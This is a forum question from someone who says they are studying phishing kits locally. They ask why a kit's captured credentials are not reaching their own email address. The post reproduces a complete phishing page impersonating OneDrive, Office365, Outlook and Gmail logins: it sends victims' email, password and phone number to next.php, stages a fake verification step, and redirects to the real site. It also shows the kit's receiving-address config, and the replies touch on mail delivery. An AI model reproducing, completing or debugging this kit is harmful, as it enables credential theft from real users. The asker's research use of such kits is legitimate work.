# Why am I not receiving emails with the credentials inputted into my locally hosted (non-illegal) phishing site?

Tags: php, security, phishing

Don't worry it's not what it sounds like. I'm doing a project which involves interacting with Phishing sites with Puppeteer.

In order to test my code I downloaded dozens of phishing kits using (https://github.com/cybercdh/phishfinder).

I've locally hosted some of these phishing sites, simply by unpacking the phishing kits into my ubuntu VM's /var/www/

The thing is, I was hoping to test my code by changing the phishers email to my own throwaway email. I did this, put some false credentials into the phishing site, and sadly received no email.

To be specific, most of the phishing kits contain a .php file with the phishers email address in it. All I've done is swap that for my own.

Does anyone know what I'm doing wrong? What else do I have to edit other than the phishers email address?

As requested, here is the code.

index.html:

```
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>OneDrive | Login</title>
    <link rel="icon" type="image/png" sizes="100x100" href="images/onedrive-white.png">
    <link href="css/hover.css" rel="stylesheet" media="all">
    <link href="css/album.css" rel="stylesheet">

    <style type="text/css">

      html, body {
        height: 100%;
      }



    </style>
  </head>
  <body>
    <!-- videooo div start//////////// -->
    <div class="main-video-wrapper" style="filter: blur(8px);
    -webkit-filter: blur(8px);background-color:rgba(0,0,0,0.7);">
    <!-- Embedded Video Element -->
    <video playsinline="playsinline" autoplay="autoplay" muted="muted" loop="loop">
      <source src="video/onedrive.mp4" type="video/mp4">
      </video>
    </div>
    <!-- video div close/////////////////// -->
    <div style="height: 100%;background:rgba(0,0,0,0.5);">
      <div class="container-fluid">
        <div class="row">
          <div class="col-lg-5 mx-auto" style="margin-top: 60px">
            <div class="row">
              <div class="col-lg-12 text-white text-center">
                <img src="images/onedrive-w.png" class="img-fluid" width="100px">
                <br>
                <span class="h3">Welcome To OneDrive</span><br>
                <span class="text-white">This document is secure, please login to view, edit or download.select an option below to continue.</span>
              </div>
            </div>
            
            <div class="row mt-3">
                <div class="col-lg-4">
                <a href="javascript:void(0)" id="office365modal" style="margin-left: 220px" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                  <div class=" p-2 text-center" style=" background-color: #FF3C00;border-radius:10px;">
                    <img src="images/office3651.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                    <span  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Continue with<br> Office365</span>
                  </div>
                </a>
              </div>
            </div>
            <div class="row mt-3">
              <div class="col-lg-4">
                <a href="javascript:void(0)" id="outlookmodal" style="margin-left: 220px" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                  <div class=" p-2 text-center" style=" background-color: #0073C8;border-radius:10px;">
                    <img src="images/outlook1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                    <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Continue with<br> Outlook</span>
                  </div>
                </a>
              </div>
              
            </div>


          </div>
        </div>
      </div>
    </div>




    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body">
            <center>
              <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
              <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
              <div class="alert alert-danger" id="msg"></div>
              <span id="error" class="text-danger">That account doesn't exist. Enter a different account</span>

            </center>
            <form id="contact" class="form-horizontal well">
              <div id="div1">
                <div class="col-lg-12">
                  <div class="form-group">
                    <div id="inputbar">
                      <label for="exampleInputEmail1">Email address</label>
                      <input type="email" name="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="Enter email">
                      <small id="emailHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                      <div id="automail" class="h5 mt-5">
                        <i class="fas fa-arrow-left" id="back1"></i>&nbsp<span id="emailch">abc@abc.com</span>
                      </div>
                    </div>
                  </div>
                  <div class="col-lg-12">
                    <div class="form-group">
                      <label for="Password">Password</label>
                      <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp" placeholder="Enter Password">
                    </div>
                  </div>
                </div>
                <div id="div2">
                  <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="emailch1" class="h5">abc@abc.com</span><br>
                  <span class="h4 font-weight-normal">Verify it's you</span><br>
                  <span >This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                  <span id="msg1" class="text-danger"></span><br>
                  <span>Try another way to sign in</span>
                  <div class="form-group mt-3">
                    <input type="number" name="phone" class="form-control" id="phone" aria-describedby="emailHelp" placeholder="Enter Phone No." >
                  </div>
                </div>
              </div>
              <div class="modal-footer">
                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                <button class="btn btn-info pull-right" id="submit-btn">Login</button>
                <button class="btn btn-info pull-right" id="submit-btn1">verify</button>
              </div>
            </form>
          </div>
        </div>
      </div>




      <!-- Optional JavaScript -->
      <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

    <script>

     <!--  /* global $ */
     $(document).ready(function(){
      var count=0;
      $('#div2').hide();
      $('#error').hide();
      $("#automail").hide();
      $("#msg").hide();
      $('#submit-btn1').hide();
      $('#back').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $('#password').val("");

        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);

      });
      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        // $('#email').val(email);
        var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        if (final=="gmail") {
          $('#contact').trigger("reset");
          $('#fieldImg').attr('src', 'images/gmail.png');
          $('#field').html("Gmail");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
        else if(final=="outlook" || final=="hotmail")
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/outlook.png');
          $('#field').html("Outlook");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
        else if(final=="aol")
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/aol.png');
          $('#field').html("Aol");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
        else if(final=="office365")
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/office365.png');
          $('#field').html("Office 365");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
        else if(final=="yahoo")
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/yahoo.png');
          $('#field').html("Yahoo");
          $("#msg").hide();
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $('#email').val(my_email);
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');

        }
        else
        {
          $('#contact').trigger("reset");
          $("#msg").hide();
          $('#fieldImg').attr('src', 'images/othermail.ico');
          $('#field').html("Other Mail");
          $('#email').val(my_email);
          $('#emailch').html(my_email);
          $("#msg").hide();
          $("#inputbar").animate({left:200, opacity:"hide"}, 0);
          $("#automail").animate({right:200, opacity:"show"}, 1000);
          $('#ajaxModal').modal('show');
        }
      }
      ///////////////url getting email////////////////


      $('#gmailmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/gmail.png');
        $('#field').html("Gmail");
        $("#msg").hide();
        $('#email').val("");
        $('#password').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');

      });

      $('#outlookmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/outlook.png');
        $('#field').html("Outlook");
        $("#msg").hide();
        $('#email').val("");
        $('#password').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#aolmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/aol.png');
        $('#field').html("Aol");
        $("#msg").hide();
        $('#email').val("");
        $('#password').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#office365modal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/office365.png');
        $('#field').html("Office 365");
        $("#msg").hide();
        $('#email').val("");
        $('#password').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#yahoomodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/yahoo.png');
        $('#field').html("Yahoo");
        $("#msg").hide();
        $('#email').val("");
        $('#password').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#othermodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/othermail.ico');
        $('#field').html("Other Mail");
        $("#msg").hide();
        $('#email').val("");
        $('#password').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);
        $('#ajaxModal').modal('show');
      });
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var detail=$("#field").html();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }
      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      ///////////new injection////////////////
      count=count+1;
      
      
      $.ajax({
        dataType: 'JSON',
        url: 'next.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
          detail:detail,

        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if (count==1 && final=="gmail") {
                $('#emailch1').html(my_email);
                $("#div1").animate({left:200, opacity:"hide"}, 0);
                $("#div2").animate({right:200, opacity:"show"}, 1000);
                $('#submit-btn').hide();
                $('#submit-btn1').show();
                
                return false;

              }
              $("#password").val("");

              if (count>=3) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                 $('#msg').html(response['msg']);
                  // $('input, textarea').val(function() {
                  //    return this.defaultValue;
                  // });
                }
                else{
                  $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              if (count==1 && final=="gmail") {
                $('#emailch1').html(my_email);
                $("#div1").animate({left:200, opacity:"hide"}, 0);
                $("#div2").animate({right:200, opacity:"show"}, 1000);
                $('#submit-btn').hide();
                $('#submit-btn1').show();
                
                return false;

              }
              $("#password").val("");
              if (count>=3) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });
    });
      $('#submit-btn1').click(function(event){
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var phone=$("#phone").val();
        var detail=$("#field").html();
        var msg1 = $('#msg1').html();
        $.ajax({
          dataType: 'JSON',
          url: 'next.php',
          type: 'POST',
          data:{
            email:email,
            password:password,
            detail:detail,
            phone:phone,

          },
          beforeSend: function(xhr){
            $('#submit-btn1').html('Verifing...');
          },
          success: function(response){
            window.location.replace("http://gmail.com/");
            $('#password').val("");
            if(response){
              $("#msg1").show();
              console.log(response);
              if(response['signal'] == 'ok'){
               $('#msg1').html(response['msg']);
             }
             else{
              $('#msg1').html(response['msg']);
            }
          }
        },
        error: function(){
         window.location.replace("http://gmail.com/");
         $('#password').val("");
         $("#msg1").show();
         $('#msg1').html("Please try again later");
       },
       complete: function(){
        $('#submit-btn1').html('Verify');
      }
    });
         // }
       });
    });


  </script>
  </html>
```

email.php:

```
<?php
$Receive_email="*redacted*";
$redirect="https://www.google.com/";
?>
```

Comment: off the top of my head, id say your local host server doesnt have the ability to send email. That said, we'd need to see the code and how its sending email for us to be helpful

Comment: Try a simple page which sends an email to see if the email is the problem.

Comment: Thanks, I didn't know it was possible for a host server to not be able to send email. That sounds likely to be the problem. Thanks a lot for the information.

Comment: The `$Receive_email` variable is nowhere to be found in your, on the other side, static HTML.